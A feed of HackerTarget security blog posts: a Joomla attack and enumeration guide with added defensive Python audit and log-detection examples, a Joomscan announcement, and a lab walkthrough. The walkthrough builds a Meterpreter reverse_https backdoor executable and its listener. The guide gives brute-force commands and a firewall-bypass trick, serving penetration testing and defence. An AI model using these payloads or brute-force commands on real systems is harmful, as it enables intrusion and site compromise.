Security Breaches – HackerTarget.com (Security Vulnerability Scanners and Assessments)

Attacking and Enumerating Joomla
https://hackertarget.com/attacking-enumerating-joomla/
Wed, 29 Jul 2020 03:16:00 +0000

The post Attacking and Enumerating Joomla appeared first on HackerTarget.com.
Discover the tips and techniques used to attack and break into Joomla based websites. An understanding of these hacker techniques will enable you to be prepared to keep your sites secure.

Additionally, penetration testers or red teams needing to exploit Joomla targets will also find practical hints in this guide.


Introduction to Joomla Security

Recent statistics show Joomla is a popular open-source Content Management System (CMS), used by close to 6% of all websites.

It is open-source, free to download, and easy to use. These things make it a popular option. Similar to WordPress's plugins, Joomla adds functionality through "Extensions".

This popularity makes it a target for bad guys aiming to use a compromised web server for malicious purposes.

A lot of Joomla security holes arise from lack of maintenance, not taking passwords seriously, poorly coded extensions and even site backups left in the web root.

Enumeration and Reconnaissance

Stage 1 is to discover as much technical information as possible about the site configuration. This information is essential as it will aid us as we move onto the actual attacking or exploitation phase.

Now is the time to put yourself in the hacker's mindset. Enumeration or reconnaissance can be conducted stealthily, using regular web requests to gather technical information about the site, or overtly, by aggressively brute-forcing web paths to identify the presence of extensions.

Joomla Identification & Version

To determine if the site is running Joomla, and to identify the Joomla Core version in use, three simple methods can be used.

Meta Generator

Check the HTML source of the page for a meta generator tag in the HEAD section of the HTML source. This is the simplest way to determine if Joomla is being used.

This example is taken from the source of a default Joomla install.

<meta name="generator" content="Joomla! - Open Source Content Management" />

joomla.xml

To identify the version we can check the joomla.xml file within the directory /administrator/manifests/files/

https://www.joomla.org/administrator/manifests/files/joomla.xml

Result

Joomla core version detection

/language/en-GB/en-GB.xml

Another option to find the version is the language file.

https://example.site/language/en-GB/en-GB.xml
<version> 3.6.5 </version>

Version in README.txt

If the meta tag has been disabled, check for the presence of /README.txt in the web root of the install. Joomla states the major version at the top of the README file.

Joomla readme example
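As an added example (not code from the HackerTarget post), the following Python script takes the three fingerprint sources just described, plus the README, and reports what a Joomla install discloses about its version. The responses it processes are constructed stand-ins for what an operator would fetch from their own site; the paths are the ones named above.

```python
"""Self-audit of Joomla version disclosure, added as an example for this page (not
HackerTarget's code). It parses the fingerprint sources described above (meta
generator tag, joomla.xml, en-GB.xml) plus README.txt. The responses below are
constructed stand-ins for what you would fetch from your own site."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional, Tuple

# Constructed sample responses keyed by path: (HTTP status, body). Not from a real site.
SAMPLE_RESPONSES: Dict[str, Tuple[int, str]] = {
    "/": (200, '<html><head><meta name="generator" content="Joomla! - Open Source Content Management" />'
               "<title>Home</title></head><body></body></html>"),
    "/administrator/manifests/files/joomla.xml": (200,
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<extension version="3.6" type="file" method="upgrade">\n'
        "  <name>files_joomla</name>\n  <version>3.6.5</version>\n"
        "  <creationDate>December 2016</creationDate>\n</extension>"),
    "/language/en-GB/en-GB.xml": (200,
        '<?xml version="1.0" encoding="utf-8"?>\n'
        '<metafile version="3.6" client="site">\n'
        "  <name>English (en-GB)</name>\n  <version>3.6.5</version>\n</metafile>"),
    "/README.txt": (200, "Joomla! CMS\n\n1- What is this?\n\t* This is a Joomla! 3.x installation/upgrade package.\n"),
    "/administrator/manifests/files/missing.xml": (404, "Not Found"),
}

GENERATOR_RE = re.compile(r'<meta\s+name=["\']generator["\']\s+content=["\']([^"\']*)["\']', re.I)
README_VERSION_RE = re.compile(r"Joomla!\s+(\d+(?:\.(?:\d+|x))*)")


def generator_from_html(html: str) -> Optional[str]:
    """Return the content of the <meta name="generator"> tag, if present."""
    match = GENERATOR_RE.search(html)
    return match.group(1) if match else None


def version_from_manifest(xml_text: str) -> Optional[str]:
    """joomla.xml and en-GB.xml both carry a <version> element directly under the root."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return None
    node = root.find("version")
    return node.text.strip() if node is not None and node.text else None


def major_version_from_readme(text: str) -> Optional[str]:
    """README.txt names the major line, e.g. 'Joomla! 3.x'."""
    match = README_VERSION_RE.search(text)
    return match.group(1) if match else None


def audit_version_exposure(responses: Dict[str, Tuple[int, str]]) -> List[Tuple[str, str]]:
    """Return (path, finding) for every source that discloses the CMS or its version."""
    findings = []
    for path, (status, body) in responses.items():
        if status != 200:
            continue  # a 403/404 here means the source is not exposed
        if path == "/":
            generator = generator_from_html(body)
            if generator and "joomla" in generator.lower():
                findings.append((path, f"generator tag discloses CMS: {generator}"))
        elif path.endswith(".xml"):
            version = version_from_manifest(body)
            if version:
                findings.append((path, f"manifest discloses core version {version}"))
        elif path.endswith("README.txt"):
            major = major_version_from_readme(body)
            if major:
                findings.append((path, f"README discloses major version {major}"))
    return findings


if __name__ == "__main__":
    for path, finding in audit_version_exposure(SAMPLE_RESPONSES):
        print(f"{path}: {finding}")
```

Each finding is a disclosure a site owner can remove: the generator tag can be cleared from the template (Joomla's document object exposes a setGenerator method), and the manifest and README paths can be denied in the web server configuration.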

Security Vulnerabilities in Joomla Core

Let's say a site with an older Joomla Core version is discovered by an attacker. This site may be directly exploitable via a security vulnerability in the Joomla core. It also shows the site is not being well maintained.

In a poorly maintained site, other components, such as Extensions or Templates, may not be updated either. The likelihood of a successful attack is dramatically higher.

Joomla Extension and version Enumeration

Similar to WordPress's plugins, Joomla adds functionality through "Extensions". Extensions are broken down into a few types:

  • Modules
  • Components
  • Templates
  • Plugins
  • Languages

All can be installed as required. Vulnerabilities can arise in any of these when poorly coded; an example would be non-logged-in users having access to the same features as logged-in users.

Enumeration is attempting to find as many installed extensions as we can, including disabled extensions. Knowing these extensions may allow us to identify the version, and research whether it is vulnerable to known exploits.

Unfortunately, unless you have the administrator account details, there is no easy way to find every single extension of a particular Joomla install.

It is worth noting Joomla maintains a live list called the Vulnerable Extensions List (VEL). This list covers vulnerable extensions for which no patch is known to exist. It can be used as a source of information or a place to start when looking at a Joomla site.

Passive

Hints to the extensions and modules present in a site may be found in the HTML source of the page. Once an add-on is identified, additional information can be gathered from its manifest file.

Active

Some extensions do not leave traces in the HTML source. To find all the installed extensions you have to be more aggressive. Several tools can brute force known extension/component lists. There is no one-size-fits-all when it comes to Joomla. Using a combination of available tools will get the best results.

One example is the Metasploit Joomla Plugin Scanner. This Metasploit auxiliary module uses a wordlist to locate valid paths, scanning for extensions and vulnerabilities.

Extension Version Enumeration

You have compiled a list of the site's extensions; now for the version. The design of Joomla means this information isn't forthcoming or comprehensive, especially when attempting to find it quietly.

It is possible you may find the extension version in a manifest file or in other resources such as the add-on's stylesheets or JavaScript.

With a valid version you can compare what has been found against known exploits. This comparison indicates whether the site is likely vulnerable, before throwing any exploits.

Joomla Template Enumeration

As with extensions, Joomla Templates can contain vulnerabilities that may expose the site to compromise. Templates are simply collections of PHP code with HTML and CSS resources. Complex templates have additional components and are more prone to security vulnerabilities.

Enumeration of the template is conducted similarly to detecting the extensions. Inspect the HTML and locate the template. Alternatively, run a passive scan on Hacker Target's Joomla Security Scan and scroll through results to find the Joomla Template.

joomla theme enumeration


One important factor when testing for vulnerable Joomla templates and components is that a template may be installed but not active; as its code is still accessible, it may still be vulnerable. For this reason, brute force testing for template paths is an additional step when assessing an unknown Joomla installation.
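An added example, not from the original post, covering the passive extension enumeration described under Passive and the template identification described under Joomla Template Enumeration: the Python below extracts component, module, plugin and template names from the asset URLs in a page's HTML, then lists the conventional Joomla manifest paths an operator should confirm are not served. The HTML fragment is constructed; real Joomla output differs per template.

```python
"""Passive extension and template enumeration from a page's HTML source, added as an
example for this page (not HackerTarget's code). Joomla emits asset URLs such as
/media/com_x/, /media/mod_x/, /media/plg_type_x/, /plugins/type/name/ and
/templates/name/, which name the installed extensions. The HTML below is constructed."""
import re
from typing import Dict, List

# Constructed HTML fragment standing in for a fetched front page (not from a real site).
SAMPLE_HTML = """
<link href="/templates/protostar/css/template.css?b6e5d8" rel="stylesheet" />
<script src="/media/jui/js/jquery.min.js?b6e5d8"></script>
<script src="/media/system/js/core.js"></script>
<link href="/media/com_contact/css/contact.css" rel="stylesheet" />
<link href="/media/mod_languages/css/template.css" rel="stylesheet" />
<script src="/media/plg_system_debug/js/debug.js"></script>
<script src="/plugins/content/pagebreak/pagebreak.js"></script>
<img src="/images/banners/osmbanner1.png" alt="banner" />
<a href="/administrator/templates/isis/images/logo.png">logo</a>
"""

ASSET_RE = re.compile(r"""(?:href|src)=["']([^"']+)["']""", re.I)
EXT_RE = re.compile(r"/(?:media|components|modules)/((?:com|mod|plg)_[a-z0-9_]+)/", re.I)
PLUGIN_DIR_RE = re.compile(r"/plugins/([a-z0-9_]+)/([a-z0-9_]+)/", re.I)
TEMPLATE_RE = re.compile(r"/(administrator/)?templates/([a-z0-9_\-]+)/", re.I)

KIND_BY_PREFIX = {"com": "components", "mod": "modules", "plg": "plugins"}


def enumerate_from_html(html: str) -> Dict[str, List[str]]:
    """Collect extension and template names referenced by asset URLs in the HTML."""
    found = {"components": set(), "modules": set(), "plugins": set(),
             "templates": set(), "admin_templates": set()}
    for url in ASSET_RE.findall(html):
        for name in EXT_RE.findall(url):
            found[KIND_BY_PREFIX[name[:3].lower()]].add(name.lower())
        for plugin_type, plugin_name in PLUGIN_DIR_RE.findall(url):
            found["plugins"].add(f"plg_{plugin_type}_{plugin_name}".lower())
        match = TEMPLATE_RE.search(url)
        if match:
            bucket = "admin_templates" if match.group(1) else "templates"
            found[bucket].add(match.group(2).lower())
    return {kind: sorted(names) for kind, names in found.items()}


def candidate_manifest_paths(found: Dict[str, List[str]]) -> List[str]:
    """Manifest files at Joomla's conventional locations; each carries a <version>
    element, so an operator should confirm the web server answers 403/404 for them."""
    paths = []
    for component in found["components"]:
        paths.append(f"/administrator/components/{component}/{component[4:]}.xml")
    for module in found["modules"]:
        paths.append(f"/modules/{module}/{module}.xml")
    for template in found["templates"]:
        paths.append(f"/templates/{template}/templateDetails.xml")
    for template in found["admin_templates"]:
        paths.append(f"/administrator/templates/{template}/templateDetails.xml")
    return paths


if __name__ == "__main__":
    inventory = enumerate_from_html(SAMPLE_HTML)
    print(inventory)
    print(candidate_manifest_paths(inventory))
```

Assets under /media/system/ and /media/jui/ belong to the core and are deliberately ignored; anything that names a com_, mod_ or plg_ directory, or a template directory, is an installed item the page reveals without a single brute-force request.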

Enumerate Users

A quick first check is whether the Administrator login page is publicly available.

https://exampledomain.com/administrator

Gather a list of valid usernames and attempt a password guessing attack to brute force the login credentials. The aim is to gain access to the administrator account. Admin access gives the attacker complete access, and consequently a full compromise of the site, the database, and remote code execution on the server through PHP code execution.

There is no simple way to do this manually in Joomla as opposed to WordPress where it may be possible to iterate through the users using a simple bash one-liner.

Joomla login form

With Joomla, it requires guesswork. All new installs have a 'Super Administrator account' called admin. As part of the install, Joomla requests a password for this account. Joomla also suggests changing the name of the account from 'admin' to something more difficult to guess.

This complicates a dictionary-based attack against the admin panel.

Enumerating users through Guessing

Start with the common one, admin, and go from there.

Joomla does not appear to allow directly listing all users, nor does it otherwise leak their information.

A default install of Joomla allows 3 privileged user groups which have access to the control panel:

  • Managers: content creation and backend system info.
  • Administrators: admin functions except global options.
  • Super Users/Administrator: ultimate power. Access all areas.

Note: from version 3.2 two-factor authentication was implemented as a core feature. Admins can enable it from User Manager in the Control Panel.

Password Re-use and Breach Datasets


A common technique used in targeted attacks is mining breach datasets for passwords. If a user's credentials were breached on another site, there is a chance they use the same password, or a variation of it, on other sites. Working from a targeted domain, passwords can quickly be found, especially in larger organisations.

Directory Indexing

A misconfigured server can allow you to view the contents of a directory in a web-accessible path.

Viewing the contents of the directory allows an attacker to gather sensitive information not intended for public viewing about the existence and contents of files, such as hidden files, backup files, config files, plugins, and templates, without the need to brute force the paths.

Start by browsing to folder locations and see if you get a 200 OK HTTP response and see a list of files / folders in the browser.

Example of directory indexing

Network Service Discovery

Here we are checking network services. The main technique used for identifying the server's attack surface is port scanning.

An Nmap port scan will identify the network services listening on the server. These could include FTP, SSH, Webmin or even the web server itself. Working from the results of the Port Scan an attacker would identify server applications, versions and look for exploitation opportunities.

Bypass Sucuri or CloudFlare Web Firewall

If the Joomla site is protected by Sucuri or CloudFlare, exploits that might otherwise succeed could be blocked. Even various reconnaissance techniques can be blocked by these web application firewalls (WAF).

By knowing the real IP address of the server it is likely we could bypass the web firewall simply by putting an entry in the client's /etc/hosts file. This works because we bypass the site's DNS that would otherwise send us via the Web Firewall.

Historical DNS Records

A common method is using historical DNS records to identify the real IP address.

  • Historical DNS records may show the original IP address before the firewall service was implemented.
  • Mail records (MX): if mail is hosted on the same server as the website, this will reveal the real host.
  • TXT/SPF records might also reveal IP addresses of interest.

TLS / SSL Certificate Searches

TLS / SSL searches against Certificate Transparency datasets may also find real hostnames associated with the site's actual IP address, if they can be matched.

JoomlaVS & Other Tools

Passive Joomla Security Scan

Hacker Target hosts a free and simple to use passive Joomla scan. Discover vulnerabilities, web server details, configuration errors, identify template, and test for directory indexing and others.

The freely available tool performs analysis from a simple page grab. Through the examination of the HTML source code, JavaScript, and a few other openly accessible pages, it is possible to gain immediate insights into the state of security on the target site. This applies only passive analysis methods, without any aggressive security scanning.

JoomScan

JoomScan is the OWASP Joomla! Vulnerability Scanner, an open source project written in Perl. It ties some of these enumeration techniques together, such as the Joomla version, vulnerabilities and the admin login page.

Check out the latest version from GitHub: https://github.com/rezasp/joomscan

Note this project has not been updated for a number of years.

JoomlaVS

JoomlaVS is an open source Ruby application. It scans for vulnerabilities in components, modules and templates and performs basic fingerprinting. More info is available on the project's page at https://github.com/rastating/joomlavs

----------------------------------------------------------------------

[JoomlaVS ASCII art banner]

----------------------------------------------------------------------

[+] URL: http://testexample.com/
[+] Started: Mon Jun 12 11:02:01 2020

[+] Found 1 interesting headers.
 |  Server: Apache

[+] Joomla version 2.5.30 identified from language file (en-GB.xml)
[!] Found 8 vulnerabilities affecting this version of Joomla!

[!] Title: Joomla Akeeba Kickstart Unserialize Remote Code Execution
 |  Reference: https://www.exploit-db.com/exploits/35033
 |  Reference: http://www.cvedetails.com/cve/CVE-2014-7228
[i] Fixed in: 3.3.5


[!] Title: Joomla Media Manager File Upload Vulnerability
 |  Reference: https://www.exploit-db.com/exploits/27610
 |  Reference: http://www.cvedetails.com/cve/CVE-2013-5576
[i] Fixed in: 3.1.5


[!] Title: Joomla 2.5.x Language Switcher ModuleMultiple Cross Site Scripting Vulnerabilities
 |  Reference: https://www.exploit-db.com/exploits/37473
[i] Fixed in: 3


[!] Title: Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution
 |  Reference: https://www.exploit-db.com/exploits/38977
 |  Reference: http://www.cvedetails.com/cve/CVE-2015-8562
[i] Fixed in: 3.4.6


[!] Title: Remote Code Execution in third-party PHPMailer library
 |  Reference: http://www.cvedetails.com/cve/CVE-2016-10033
 |  Reference: http://www.cvedetails.com/cve/CVE-2016-10045
[i] Fixed in: 3.6.5


[!] Title: Unauthorised Logins
 |  Reference: http://www.cvedetails.com/cve/CVE-2014-6632
[i] Fixed in: 3.3.3


[!] Title: Denial of Service
 |  Reference: http://www.cvedetails.com/cve/CVE-2014-7229
[i] Fixed in: 3.3.4


[!] Title: Joomla! < 3.6.4 Privilege Escalation
 |  Reference: http://www.cvedetails.com/cve/CVE-2016-9838
[i] Fixed in: 3.6.4


[+] Scanning for vulnerable components...
[!] Found 0 vulnerable components.

------------------------------------------------------------------

[+] Scanning for vulnerable modules...
[!] Found 0 vulnerable modules.

------------------------------------------------------------------

[+] Scanning for vulnerable templates...
[!] Found 0 vulnerable templates.

------------------------------------------------------------------

[+] Finished

CMSMap

As the name implies, CMSMap covers the most popular CMSs. An open source project written in Python, this tool has support for Joomla, WordPress and Drupal. Useful for automating a scan for low-hanging fruit.

Download the latest version of CMSMap github: 

git clone https://github.com/Dionach/CMSmap 

Attacking and Exploitation

Brute Force Joomla logins

The 2013 Joomla 3.2 stable release brought 2FA as part of the core install, which adds another challenge to brute-forcing an account. But it isn't enabled by default.

Popping Weak Passwords

Detecting weak passwords for Joomla comes in a variety of ways. There are many ways to brute force a login page; here are a few.

joomla administration panel

Nmap NSE Scripts for Joomla

Nmap is best known for network discovery; however, NSE scripts extend the functionality of the popular Nmap port scanner. An Nmap NSE script is particularly helpful for performing a brute-force password attack against a Joomla install.

    $ nmap -p80 --script http-joomla-brute example-site

Burpsuite

If there is a login form on the site or you have found the administrator interface, then Burp Suite can be used to try to brute force the password.

There are other tools around such as JoomBrute, and others such as Hydra and Ncrack, though the latter two are better suited to other protocols.

Metasploit

Rapid7's Metasploit provides a few modules for brute forcing CMS and Joomla logins for various Joomla versions. One is the Joomla Bruteforce Login utility:

msf > use auxiliary/scanner/http/joomla_bruteforce_login
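From the defender's side, the one thing the brute-force tools above have in common is a burst of POSTs to the login endpoint. The following Python, added here as an example and not part of the original post, runs a sliding-window count over constructed Apache combined-format access log lines and flags clients exceeding a threshold; Joomla answers both failed and successful logins with a redirect, so the count, not the status code, is the signal. The window and threshold are assumptions to tune per site.

```python
"""Detection of password guessing against Joomla login endpoints in combined-format
access logs, added as an example for this page (not HackerTarget's code). The check
is rate-based: many POSTs to a login endpoint from one client in a short window.
The log lines are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from typing import Dict, List

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
TIME_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def constructed_log() -> List[str]:
    """Build sample lines: one client hammering /administrator, one logging in normally."""
    base = datetime(2020, 7, 29, 3, 16, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(12):  # 12 admin login POSTs in 22 seconds from 203.0.113.7
        ts = (base + timedelta(seconds=2 * i)).strftime(TIME_FORMAT)
        lines.append(f'203.0.113.7 - - [{ts}] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"')
    for i in range(2):  # two front-end logins ten minutes apart from 198.51.100.4
        ts = (base + timedelta(minutes=10 * i)).strftime(TIME_FORMAT)
        lines.append(f'198.51.100.4 - - [{ts}] "POST /index.php?option=com_users&task=user.login HTTP/1.1" 303 0 "-" "Mozilla/5.0"')
    ts = (base + timedelta(minutes=1)).strftime(TIME_FORMAT)
    lines.append(f'198.51.100.4 - - [{ts}] "GET /administrator/ HTTP/1.1" 200 4321 "-" "Mozilla/5.0"')
    lines.append("garbage line that does not parse")
    return lines


def is_login_attempt(method: str, path: str) -> bool:
    """POSTs to the admin panel entry point or the front-end user.login task."""
    return method == "POST" and (path.startswith("/administrator/index.php") or "task=user.login" in path)


def detect_login_bursts(lines: List[str], window_seconds: int = 60, threshold: int = 10) -> Dict[str, int]:
    """Return {client_ip: peak attempts within any window} for clients at or above threshold."""
    attempts = defaultdict(list)
    for line in lines:
        match = LOG_RE.match(line)
        if not match or not is_login_attempt(match["method"], match["path"]):
            continue
        attempts[match["ip"]].append(datetime.strptime(match["ts"], TIME_FORMAT))
    alerts = {}
    for ip, times in attempts.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):  # sliding window over sorted timestamps
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[ip] = peak
    return alerts


if __name__ == "__main__":
    for ip, peak in detect_login_bursts(constructed_log()).items():
        print(f"ALERT {ip}: {peak} login attempts within 60s")
```

The same count feeds naturally into a fail2ban-style block or, less disruptively, into enabling the core two-factor authentication mentioned above for the administrator accounts.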

Exploit Joomla Extensions

One of the most common reasons for Joomla sites being compromised is vulnerable extensions, modules & plugins. These all contain a large amount of PHP code and come from developers of differing levels of skills, abilities, and focus when it comes to writing software that is secure.

Keeping the Joomla extensions, core and templates updated and/or patched needs to be a routine task for the Joomla administrator of the site.


1,437 published exploits for Joomla and its components

Joomla Security announcements and Vulnerable extensions list

The Joomla Developer Network publishes Security Announcements, a feed of recently resolved security issues in Joomla software releases.

As part of the Joomla extension directory, Joomla has a list of Vulnerable Extensions.

Exploit Example

An issue was discovered in the Creative Contact Form extension (2019). A directory traversal vulnerability resides in the filename field for uploaded attachments. An attacker could exploit this vulnerability with the "Send me a copy" option to receive any files of the filesystem via email.

Exploit References:
https://packetstormsecurity.com/files/156655/Creative-Contact-Form-4.6.2-Directory-Traversal.html
https://nvd.nist.gov/vuln/detail/CVE-2020-9364#VulnChangeHistorySection

Exploit Joomla Template

While vulnerabilities in templates are not as common as in extensions, it is still worth checking the template in use. Check the developer's page for security-related updates, and if it is a custom environment, running standard web application testing may discover unpublished vulnerabilities.

In this example of an XSS vulnerability, we see that even the Joomla Core Default template had a vulnerability as recently as 2019.

Exploit References:
https://developer.joomla.org/security-centre/791-20190901-core-xss-in-logo-parameter-of-default-templates.html

Exploiting Joomla Core

Vulnerabilities in Joomla Core are highly valued by an attacker as they do not depend on a particular extension being installed.

In 2016, 2 critical vulnerabilities allowed privilege escalation by remote users. Attackers were first able to create accounts even if account registration was disabled, and second, increase their privileges on any Joomla site using versions 3.4.4 to 3.6.3. Attackers could then upload a backdoor and ultimately control the site.

The solution was to upgrade to version 3.6.4. Joomla devs released limited information on the vulnerabilities; however, it was enough for groups to figure things out and develop exploits. Exploits in the wild were spotted, some of which were automatically uploading backdoors to vulnerable sites.

Exploit References:
CVE-2016-8870
CVE-2016-8869
Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation

Sniff and Capture Credentials over non-secure login

HTTP over TLS should be enabled on any public website in 2020. If only HTTP is used, passwords, logins and session cookies are all sent over the network in the clear. Clear text sessions could be monitored on your local network, or on your Internet providers network or anywhere between the client and server.

With the easy access to free certificates there is really no reason not to be using HTTPS. Check your TLS configuration with tools such as sslyze.

Vulnerable Server Software

Exploitation of the Joomla site could come from other server components - it is not always the Joomla Web Application that will be the exploitation vector. A simple misconfiguration of a network service or a failure to apply server updates could lead to compromise of the server and all hosted applications.

With the results of an Nmap scan, an attacker will review open services for known vulnerabilities. A small sample of these network services includes FTP, SSH, MySQL & Redis - any of these could lead to server compromise if vulnerable or poorly configured.

Compromise Systems Administration Tools

Related to the previous section, here we are identifying server applications that may lead to compromise of the Joomla site.

An example of this type of tool is phpMyAdmin running on the web server. A weak database password or a vulnerable version of phpMyAdmin would lead to compromise of the database and possibly even code execution.

Discovery of the phpMyAdmin installation would usually involve a content discovery scan whose wordlist includes the common paths for phpMyAdmin.

Content Discovery

Sensitive information, database credentials and backups are just a few of the items that can be found with content discovery. Content discovery is attempting to find any interesting items contained within a web path of an application. There are a variety of tools out there catering for this purpose. Choose the one or ones that suit your needs. A few example tools are DIRB, DirBuster, dirsearch and gobuster.

Common locations to check are:

    /robots.txt
    /backup
    /images/
    /bin/
    /uploads/
    /components/
    /administrator/
    /.htaccess.txt
    /index.html
    /index.php
    /templates/exampletemplate
    /administrator/templates/exampletemplate
    /phpmyadmin/
    /phpinfo.php

Found Backups

Using content discovery, a commonly found vulnerability is a site backup. This results from a mistake during system administration where a backup of the folder was taken and left in the publicly accessible web root (e.g. /backup.tar.gz).

With a backup an attacker has access to all files of the installation including all installed components as well as the configuration file containing the database location and password.

PHP info

Another commonly found item during content discovery is a file with the PHP function phpinfo(). Site administrators will often create a file in the root of the site such as /phpinfo.php, the function in this file allows the administrator to know what modules, PHP version and many other server configurations are available on the webserver. This information is also valuable to an attacker if the file is forgotten and left on the server.
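The following Python, added as an example rather than code from the post, triages content-discovery results for the findings covered in the Directory Indexing, Content Discovery, Found Backups and PHP info sections: it labels directory listings, archives in the web root, phpinfo() pages and a reachable phpMyAdmin. The responses are constructed; an operator would feed it the status, content type and body captured for each path checked on their own site.

```python
"""Triage of content-discovery results, added as an example for this page (not
HackerTarget's code). Given (status, content type, body) per path it flags directory
indexing, backup archives in the web root, forgotten phpinfo() pages and a reachable
phpMyAdmin login. The responses below are constructed, not captured from a real site."""
from typing import Dict, Optional, Tuple

# Constructed responses keyed by path: (status, content-type, start of body as text).
SAMPLE_RESULTS: Dict[str, Tuple[int, str, str]] = {
    "/backup/": (200, "text/html",
        "<html><head><title>Index of /backup</title></head><body><h1>Index of /backup</h1>"
        '<a href="site-2020-07-28.tar.gz">site-2020-07-28.tar.gz</a></body></html>'),
    "/backup.tar.gz": (200, "application/x-gzip", "\x1f\x8b\x08\x00"),
    "/phpinfo.php": (200, "text/html",
        "<html><head><title>phpinfo()</title></head><body><h1>PHP Version 7.3.19</h1></body></html>"),
    "/phpmyadmin/": (200, "text/html",
        '<html><head><title>phpMyAdmin</title></head><body><form method="post" action="index.php">'
        "</form></body></html>"),
    "/administrator/": (200, "text/html",
        "<html><head><title>Example - Administration</title></head><body>"
        '<form method="post" action="/administrator/index.php"></form></body></html>'),
    "/images/": (403, "text/html", "<html><head><title>403 Forbidden</title></head></html>"),
    "/uploads/": (404, "text/html", "<html><head><title>404 Not Found</title></head></html>"),
    "/robots.txt": (200, "text/plain", "User-agent: *\nDisallow: /administrator/\n"),
}

BACKUP_SUFFIXES = (".tar.gz", ".tgz", ".zip", ".sql", ".sql.gz", ".bak", ".old", ".7z")


def classify(path: str, status: int, content_type: str, body: str) -> Optional[str]:
    """Label a single response, or None when nothing sensitive is exposed."""
    if status != 200:
        return None  # 403/404: listing disabled, or the path does not exist
    head = body[:4096].lower()
    # Apache/nginx auto-index pages carry an "Index of" title and a parent-directory link.
    if "<title>index of " in head or "parent directory" in head:
        return "directory index"
    # An archive served from the web root with a non-HTML type is the classic forgotten backup.
    if path.lower().endswith(BACKUP_SUFFIXES) and not content_type.startswith("text/html"):
        return "backup archive"
    # phpinfo() output titles itself; the version banner is a weaker secondary hint.
    if "<title>phpinfo()</title>" in head or "php version " in head:
        return "phpinfo page"
    # A phpMyAdmin login form reachable from the internet is a database-facing attack surface.
    if "phpmyadmin" in head and "<form" in head:
        return "phpMyAdmin exposed"
    return None


def review_content_discovery(results: Dict[str, Tuple[int, str, str]]) -> Dict[str, str]:
    """Return {path: label} for every response that classify() flags."""
    findings = {}
    for path, (status, content_type, body) in results.items():
        label = classify(path, status, content_type, body)
        if label:
            findings[path] = label
    return findings


if __name__ == "__main__":
    for path, label in review_content_discovery(SAMPLE_RESULTS).items():
        print(f"{label:20} {path}")
```

The 403 on /images/ is the healthy outcome: the directory exists but the server refuses to list it. Anything labelled here is a file to move out of the web root or a path to deny in the server configuration.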


Joomscan added to the online Joomla Security Scan
https://hackertarget.com/joomscan-added-to-the-online-joomla-security-scan/
Tue, 15 May 2012 09:08:09 +0000
Our Joomla Security Scanner tool has been extended with the Joomscan security testing tool. Joomscan is a tool that tests a Joomla installation for known vulnerable plugins and core security configuration mistakes. Detection of these vulnerabilities will allow a web site owner to get the plugins updated or fixed before they get attacked.

Joomla is a popular content management system that is very extensible. This popularity and wide range of extensions makes it a popular target for hackers.

The Joomscan tool has the following features:

  • Exact version Detection - the scanner can pinpoint versions with a greater accuracy than just the meta generator tag.
  • Joomla! based web application firewall plugin detection
  • Probes for known vulnerable Joomla Core security issues as well as extensions / plugins

Back in 2009 HackerTarget.com had the Joomscan scanner as a free scanning tool; however, due to abuse we decided to discontinue the tool. With a recent update we have decided to make this version an extension of our current non-intrusive tool. Use of the active Joomscan component will require a valid HackerTarget.com membership. This will ensure any abuse of the tool is limited and will provide a better experience for all our users.

Joomscan is a Perl-based tool that anyone can download and install. Why not give it a go yourself? Head over to the project page and start your own testing.

Backdoor Corporate Networks with Metasploit
https://hackertarget.com/backdoor-corporate-networks-with-metasploit/
Fri, 15 Jul 2011 12:55:53 +0000
HD Moore announced a new post-exploitation tool offering Meterpreter sessions over HTTPS (HTTP) that will traverse the corporate proxy. Variations on this have been available previously but have, for a number of reasons, been not so stable.

The purpose of this post is to raise awareness. Many IT folks are comfortable with a firewall, regular patching and antivirus. All good right?

Let's first look at a common locked-down corporate network. Then we will show how pwnage is not difficult with this new payload.

Lab Setup

I am simulating the network with 3 virtual guest machines and the host Ubuntu Linux system. 1 virtual guest will act as the Firewall and Proxy, while the 2 other guests are Windows clients that will be the targets. The laptop host in this lab is the attacker on the Internet.

System                     Operating System                                    IP Address
Laptop (host)              Ubuntu 11.04, 4 GB RAM, running VirtualBox          Host Only Networking: 192.168.56.1
Linux Gateway (guest1)     Smoothwall with Proxy and Outbound Firewall Rules   Host Only Network: 192.168.56.101
                                                                               Host Only Network2: 10.10.10.1
Windows Victim1 (guest2)   Windows XP Service Pack 3, no additional patches    Host Only Network2: 10.10.10.199
Windows Victim2 (guest3)   Windows 7 Enterprise, fully patched                 Host Only Network2: 10.10.10.198

On the virtual gateway Smoothwall box I configured DHCP, Proxy, Snort and Firewall Rules to block outbound traffic. Only port 22 (for sftp) and the proxy port (TCP 800) were opened. This has simulated the corporate network in the diagram above.

Build the malicious exe

Now build the malicious executable.

In this test we are building an exe to launch the Payload. Code execution on the client host could be accomplished in many ways, exploitation via social engineering, emailed links with malicious java applets, client based exploits etc.

On the Laptop I am running Metasploit Framework 3.7.2.

/opt/framework-3.7.2/msf3# msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=192.168.56.1 LPORT=443 > evil_https.exe

Listen

Now to setup the listener on the laptop.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://192.168.56.1:443/
[*] Starting the payload handler...
msf exploit(handler) >

Use scp or whatever to copy evil_https.exe to the Windows XP system and then run it.

